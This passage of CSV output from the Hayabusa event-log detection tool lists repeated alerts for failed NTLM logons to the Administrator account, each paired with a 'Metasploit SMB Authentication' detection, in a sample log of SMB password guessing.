Password,User: Administrator : Type: 3 : Workstation: 5GmlVWDjZ75tT08G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6v1DkuFvB04PESQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTLdNb0XbzXuLi51 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSjDYb1BhHC9UTxO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1yLH19VsfLx9BGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4AVhjdz9yHsfss0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqWLOKaKwS8VBxDj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjK8A8DTSYursBzj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaDCKPslwRaLBWtH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAvoekviFDSAIgBe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 3XOmFwh8IamESWCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 54GbW769j1x27mrI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bZSkhwZXc1SSknDT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 05AuqlN44x7oJGoi : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ4A6ReTVTcFCFeN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T7U6i4CMrL0bHouf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NaeA4uZ6o8BRbzwf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MEnlL5BHmlCrtk7p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNMpwAAaTsyzPfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oBtHQkRWIoq5hfn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 5pkk9lgqMQ4wxQel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQVan7kRDOlnim50 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9282GqsC7UiUMbRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3lj7GjYryW9wjGgS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPy4iUy5WBSLUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kvD9DEuos8SRrLH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NH1EnMG6fTvcz4QR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqHDXSQn8gkl2LJy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWI9XDDHjs2xcNB7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zo53mEz6nal5Gxff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: jtOgC6wqMoNYVxId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdadoJYvD7DYjlSG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U1xjdqjT9h0KUqG2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfkzZBvO4onYx6JZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JqY8CvyODDLQV9Ps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPMRIxRVuh13jmZD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jARkTWdKTfTIwlug : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zwhkc71Nfn7QDf7c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qsYad9PgEajlYqvo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9YPw0DsspVbrOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: wsHpLCOdAOPFM6nD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcNytOhGOZKaREL9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lc5boBVigHE1ccGA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQXg4ZHdBYHyiTTO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JebTJzyn91NrpvkD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wCE5ypjEU5feEEv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OglsROoqX48xm0gJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
